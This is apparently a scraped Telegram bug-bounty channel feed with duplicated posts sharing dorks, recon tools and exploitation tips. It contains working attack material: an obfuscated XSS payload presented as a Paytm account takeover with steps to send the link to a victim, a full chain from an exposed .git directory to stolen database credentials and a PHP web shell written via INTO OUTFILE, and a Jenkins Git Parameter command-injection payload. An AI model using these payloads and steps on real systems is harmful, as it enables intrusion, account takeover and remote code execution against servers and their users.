Hey Hunter's,
DarkShadow here back again, just dropping a dorkπ€«
β¨google dork searching public exploits from githubπ
#dork #bugbountytips
DarkShadow here back again, just dropping a dorkπ€«
β¨google dork searching public exploits from githubπ
"CVE-YYYY-NNNN" exploit site:github.com
"CVE-YYYY-NNNN" exploit POC site:github.com
"CVE-YYYY-NNNN" proof of concept site:github.com
#dork #bugbountytips
β€10π7π₯4
π¨ Brut Security - New Batch Starts 18th August!
Join our Ethical Hacking Network Pentesting & Web Pentesting / Bug Bounty training β practical sessions, real-world attacks, and community support from Day 1.
β DM +918945971332 to enroll. Limited slots.
βhttps://wa.me/918945971332
Join our Ethical Hacking Network Pentesting & Web Pentesting / Bug Bounty training β practical sessions, real-world attacks, and community support from Day 1.
β DM +918945971332 to enroll. Limited slots.
βhttps://wa.me/918945971332
WhatsApp.com
Brut Security
Business Account
β€7
Hey Hunter's,
DarkShadow hare back again.
πΏππ§π ππ£ππππ£πππ§ my own private tool which i used to extract endpoints from browse through passive recon.
β¨ Features:
β Extract subdomains.
β Extract categories endpoints from subdomains.
β Extract external domains.
If you find this tool useful, give it a βοΈ and share it with others in the hacking & BugBounty community!
https://github.com/darkshadow2bd/DarkEndFinder
DarkShadow hare back again.
πΏππ§π ππ£ππππ£πππ§ my own private tool which i used to extract endpoints from browse through passive recon.
β¨ Features:
β Extract subdomains.
β Extract categories endpoints from subdomains.
β Extract external domains.
If you find this tool useful, give it a βοΈ and share it with others in the hacking & BugBounty community!
https://github.com/darkshadow2bd/DarkEndFinder
GitHub
GitHub - darkshadow2bd/DarkEndFinder: BookMark and Find Subdomains, Endpoints, External Domains in your web browser.
BookMark and Find Subdomains, Endpoints, External Domains in your web browser. - GitHub - darkshadow2bd/DarkEndFinder: BookMark and Find Subdomains, Endpoints, External Domains in your web browser.
β€16π3π¨βπ»3π2
CVE-2025-7443: Unrestricted Upload of File with Dangerous Type in BerqWP Plugin, 8.1 ratingβοΈ
Lack of file validation allows attackers to upload arbitrary files, which can lead to RCE.
Search at Netlas.io:
π Link: https://nt.ls/puxoz
π Dork: http.body:"plugins/searchpro"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-2242-unauthenticated-arbitrary-file-upload
Lack of file validation allows attackers to upload arbitrary files, which can lead to RCE.
Search at Netlas.io:
π Link: https://nt.ls/puxoz
π Dork: http.body:"plugins/searchpro"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-2242-unauthenticated-arbitrary-file-upload
π¨βπ»6β€3π«‘2
π¨βπ³ Damn-Vulnerable-RESTaurant π¨βπ³
β‘οΈAn intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.
β Get: https://github.com/theowni/Damn-Vulnerable-RESTaurant-API-Game
β‘οΈAn intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.
β Get: https://github.com/theowni/Damn-Vulnerable-RESTaurant-API-Game
π₯14β€12
Media is too big
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow here back again!
SubClick One-click Subdomain Finder Bookmark template.
π§ Features
β One-click execution β just add to bookmarks and click
β No setup required β works as a browser bookmarklet
β Fast subdomain discovery from multiple public sources
β Subdomain live check (best-effort, despite CORS/CSP)
β Download results as .txt directly from the browser
β Displays subdomains as clickable links with basic status
β Fully client-side β no server or data collection involved
β Bug bounty friendly β made for recon & live target scanning
#bugbountytips #infosec
DarkShadow here back again!
SubClick One-click Subdomain Finder Bookmark template.
This is my private tool that I use during bug hunting.
If you guys like it, Iβll publish it on my GitHub.
Iβve uploaded a sample video demo β let me know what you think!
π§ Features
β One-click execution β just add to bookmarks and click
β No setup required β works as a browser bookmarklet
β Fast subdomain discovery from multiple public sources
β Subdomain live check (best-effort, despite CORS/CSP)
β Download results as .txt directly from the browser
β Displays subdomains as clickable links with basic status
β Fully client-side β no server or data collection involved
β Bug bounty friendly β made for recon & live target scanning
#bugbountytips #infosec
π€13β€7π«‘4π₯2
Brut Security
Hey Hunter's, DarkShadow here back again! SubClick One-click Subdomain Finder Bookmark template. This is my private tool that I use during bug hunting. If you guys like it, Iβll publish it on my GitHub. Iβve uploaded a sample video demo β let me know whatβ¦
Hey Hunter's,
DarkShadow here back again dropping my own private tool now!
SubClick is now available in my GitHub repo.
Collect subdomains in just one click! Bookmark β visit target β click β done β
https://github.com/darkshadow2bd/SubClick
β¨If it is helpful give a β in GitHub
#bugbountytips #infosec
DarkShadow here back again dropping my own private tool now!
SubClick is now available in my GitHub repo.
Collect subdomains in just one click! Bookmark β visit target β click β done β
https://github.com/darkshadow2bd/SubClick
#bugbountytips #infosec
π₯12β€10π1
Hey Hunter's,
DarkShadow here back again, dropping a recent XSS patch in Paytm!
πStep to reproduce:
1. Enter the payload in search box
2. Grape the URL.
3. Send it to the victim.
4. One click account takeover!
β Payload:
Cradit ~@TEAM_DH049
#bugbountytips #xss
DarkShadow here back again, dropping a recent XSS patch in Paytm!
πStep to reproduce:
1. Enter the payload in search box
2. Grape the URL.
3. Send it to the victim.
4. One click account takeover!
β Payload:
<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>
Cradit ~
#bugbountytips #xss
1β€21π4π3π₯2
Hey Hunter's,
DarkShadow here back again....
Just wanted to announce all of you that:
Let me know what's your Instagram account id, i wanna see your chat's in Instagram π
Don't forget to follow me ππΌ x.com/darkshadow2bd
DarkShadow here back again....
Just wanted to announce all of you that:
β¨Instagram.com is my now π
Let me know what's your Instagram account id, i wanna see your chat's in Instagram π
Don't forget to follow me ππΌ x.com/darkshadow2bd
π±10π6β€4π«‘2π1
Hey Hunter's,
DarkShadow here back again, dropping one of my secret methodologies that turns a full Remote Code Execution!
π₯ From /.git to FULL RCE β The Ultimate Git-Based Exploitation Chainπ₯
π― Target: Exposed .git/ Directory
You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again β weβre about to break that into Critical RCE π₯
π Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.
βοΈ Step-by-Step Exploitation
Step 1: Dump the Git Repo
Use GitDumper from GitTools:
Step 2: Reconstruct the Source Code
β This restores all files from the latest commit, giving you full access to the source code.
Step 3: Explore Git History for Secrets
Look for hardcoded credentials, tokens, DB configs, etc.
π Realistic Example:
Weβve got database password!
Step 4: Connect to the Database
Step 5: Escalate to RCE via SQL
Check your privileges:
β If You Have FILE Privilege:
Write a web shell to the web root:
Then browse:
Boom π₯ β Remote Code Execution on the box!
If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X ππΌ x.com/darkshadow2bd
#bugbountytips
DarkShadow here back again, dropping one of my secret methodologies that turns a full Remote Code Execution!
π₯ From /.git to FULL RCE β The Ultimate Git-Based Exploitation Chainπ₯
π― Target: Exposed .git/ Directory
You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again β weβre about to break that into Critical RCE π₯
π Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.
βοΈ Step-by-Step Exploitation
Step 1: Dump the Git Repo
Use GitDumper from GitTools:
git clone https://github.com/internetwache/GitToolsπ This tool will recursively download the entire .git repository into /webCode
cd GitTools/Dumper
bash gitdumper.sh https://target.com/.git/ webCode
Step 2: Reconstruct the Source Code
cd webCode
git checkout .
β This restores all files from the latest commit, giving you full access to the source code.
Step 3: Explore Git History for Secrets
git log -p
Look for hardcoded credentials, tokens, DB configs, etc.
π Realistic Example:
commit 3b95f2c798a12427a1234b6d1234567890abcdef
Author: dev_admin <[email protected]>
Date: Thu Jul 11 17:32:15 2024 +0000
Added database config
diff --git a/config.php b/config.php
new file mode 100644
+++ b/config.php
@@ -0,0 +1,6 @@
+<?php
+$db_host = "258.20.78.55";
+$db_user = "root";
+$db_pass = "master_!pass2020";
+$db_name = "production";
+?>
Weβve got database password!
Step 4: Connect to the Database
mysql -h 258.20.78.55 -u root -p'master_!pass2020'
Step 5: Escalate to RCE via SQL
Check your privileges:
SHOW GRANTS FOR CURRENT_USER;
β If You Have FILE Privilege:
Write a web shell to the web root:
SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';
Then browse:
https://target.com/shell.php?cmd=id
Boom π₯ β Remote Code Execution on the box!
If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X ππΌ x.com/darkshadow2bd
#bugbountytips
π₯20β€11π«‘5π1
β‘ COMMIX - Automated All-in-One OS Command Injection Exploitation Tool.
β https://github.com/commixproject/commix
#bugbountytips #bugbounty
β https://github.com/commixproject/commix
#bugbountytips #bugbounty
π₯10β€6
Need to quickly check for exposed backup files? Check out fuzzuli, a simple tool by @musana to quickly check for sensitive files! π€
π github.com/musana/fuzzuli
π github.com/musana/fuzzuli
β€8π₯3
Hey Hunter's,
DarkShadow here back again, just dropping a critical RCE...
π₯Jenkins Git Parameter Plugin β Command Injectionπ
The Jenkins plugin βGit Parameterβ (versions up to 439.vb_0e46ca_14534) allows attackers to inject arbitrary Git parameter values into shell commands.
Approximately 15,000 publicly accessible Jenkins servers have authentication disabled! And some others allow anyone to create accounts freely.
POC payload:
insert here $(YOUR OS COMMANDS)
So guy's if you like to more read latest POC's show your love's and share.
~DarkShadow
#bugbountytips #poc #Infosec #rce
DarkShadow here back again, just dropping a critical RCE...
π₯Jenkins Git Parameter Plugin β Command Injectionπ
The Jenkins plugin βGit Parameterβ (versions up to 439.vb_0e46ca_14534) allows attackers to inject arbitrary Git parameter values into shell commands.
Approximately 15,000 publicly accessible Jenkins servers have authentication disabled! And some others allow anyone to create accounts freely.
POC payload:
set parameter type: branch
Input the Payload in, set default value: $(sleep 80)
insert here $(YOUR OS COMMANDS)
So guy's if you like to more read latest POC's show your love's and share.
~DarkShadow
#bugbountytips #poc #Infosec #rce
β€16π3π2
Notes from "How to Crush Bug Bounties in the first 12 Months" by @hakluke
π₯16π¨βπ»1πΏ1